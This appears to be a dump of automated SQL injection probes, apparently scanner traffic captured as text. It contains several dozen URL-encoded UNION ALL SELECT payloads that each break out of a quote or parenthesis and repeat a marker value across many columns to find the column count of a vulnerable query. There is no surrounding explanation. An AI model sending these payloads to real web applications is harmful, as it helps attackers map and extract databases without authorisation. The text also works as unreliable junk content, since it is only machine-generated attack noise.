-6112%27%29%20UNION%20ALL%20SELECT%201196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%2C1196%23 -3842%27%29%20UNION%20ALL%20SELECT%209880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%23 -6915%27%29%20UNION%20ALL%20SELECT%204888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%23 -8469%27%29%20UNION%20ALL%20SELECT%206999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%23 -7234%27%29%20UNION%20ALL%20SELECT%203944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%23 -7126%27%29%20UNION%20ALL%20SELECT%209456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%23 -3387%27%29%20UNION%20ALL%20SELECT%202967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%23 -2394%27%29%29%20UNION%20ALL%20SELECT%209764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%23 -5412%27%29%29%20UNION%20ALL%20SELECT%205165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%2C5165%23 -5351%27%29%29%20UNION%20ALL%20SELECT%209999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%23 -2443%27%29%29%20UNION%20ALL%20SELECT%206051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%23 -6335%27%29%29%20UNION%20ALL%20SELECT%203812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%23 -9165%27%29%29%20UNION%20ALL%20SELECT%201602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%2C1602%23 -6990%27%29%29%20UNION%20ALL%20SELECT%208553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%23 -7228%27%29%29%20UNION%20ALL%20SELECT%207075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%23 -7517%27%29%29%20UNION%20ALL%20SELECT%203935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%23 -9394%27%29%29%20UNION%20ALL%20SELECT%202391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%2C2391%23 -9852%27%29%29%29%20UNION%20ALL%20SELECT%207101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%2C7101%23 -4819%27%29%29%29%20UNION%20ALL%20SELECT%201232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%23 -6697%27%29%29%29%20UNION%20ALL%20SELECT%209613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%23 -5934%27%29%29%29%20UNION%20ALL%20SELECT%206866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%23 -1190%27%29%29%29%20UNION%20ALL%20SELECT%206788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%23 -3919%27%29%29%29%20UNION%20ALL%20SELECT%207181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%2C7181%23 -9619%27%29%29%29%20UNION%20ALL%20SELECT%202096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%2C2096%23 -7562%27%29%29%29%20UNION%20ALL%20SELECT%209057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%2C9057%23 -1604%27%29%29%29%20UNION%20ALL%20SELECT%208912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%2C8912%23 -9609%27%29%29%29%20UNION%20ALL%20SELECT%209439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%23 -3802%27%20UNION%20ALL%20SELECT%201563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%23 -3797%27%20UNION%20ALL%20SELECT%204707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%2C4707%23 -7664%27%20UNION%20ALL%20SELECT%203640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%2C3640%23 -3604%27%20UNION%20ALL%20SELECT%205789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%23 -1709%27%20UNION%20ALL%20SELECT%201966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%23 -1535%27%20UNION%20ALL%20SELECT%201606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%23 -2233%27%20UNION%20ALL%20SELECT%208494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%2C8494%23 -9364%27%20UNION%20ALL%20SELECT%206170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%23 -5033%27%20UNION%20ALL%20SELECT%207277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%23 -9526%27%20UNION%20ALL%20SELECT%201365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%2C1365%23 -9235%22%29%20UNION%20ALL%20SELECT%203898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%23 -8498%22%29%20UNION%20ALL%20SELECT%207388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%2C7388%23 -5853%22%29%20UNION%20ALL%20SELECT%203180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%2C3180%23 -1331%22%29%20UNION%20ALL%20SELECT%202514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%2C2514%23 -7429%22%29%20UNION%20ALL%20SELECT%205243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%2C5243%23 -7628%22%29%20UNION%20ALL%20SELECT%209106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%23 -8197%22%29%20UNION%20ALL%20SELECT%209199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%23 -6214%22%29%20UNION%20ALL%20SELECT%202782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%2C2782%23 -5721%22%29%20UNION%20ALL%20SELECT%205025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%2C5025%23 -9998%22%29%20UNION%20ALL%20SELECT%206897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%2C6897%23 -1830%22%29%29%20UNION%20ALL%20SELECT%209737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%2C9737%23 -3536%22%29%29%20UNION%20ALL%20SELECT%203127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%2C3127%23 -8347%22%29%29%20UNION%20ALL%20SELECT%202893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%23 -9860%22%29%29%20UNION%20ALL%20SELECT%206871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%23 -6202%22%29%29%20UNION%20ALL%20SELECT%209644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%23 -3366%22%29%29%20UNION%20ALL%20SELECT%204219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%23 -8223%22%29%29%20UNION%20ALL%20SELECT%201150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%23 -6041%22%29%29%20UNION%20ALL%20SELECT%207419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%23 -3361%22%29%29%20UNION%20ALL%20SELECT%204853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%23 -6874%22%29%29%20UNION%20ALL%20SELECT%209233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%2C9233%23 -2154%22%29%29%29%20UNION%20ALL%20SELECT%204193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%2C4193%23 -1271%22%29%29%29%20UNION%20ALL%20SELECT%209199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%23 